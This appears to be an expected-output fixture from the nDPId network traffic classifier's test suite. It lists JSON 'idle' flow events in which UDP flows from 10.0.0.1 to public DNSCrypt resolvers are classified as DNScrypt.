-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
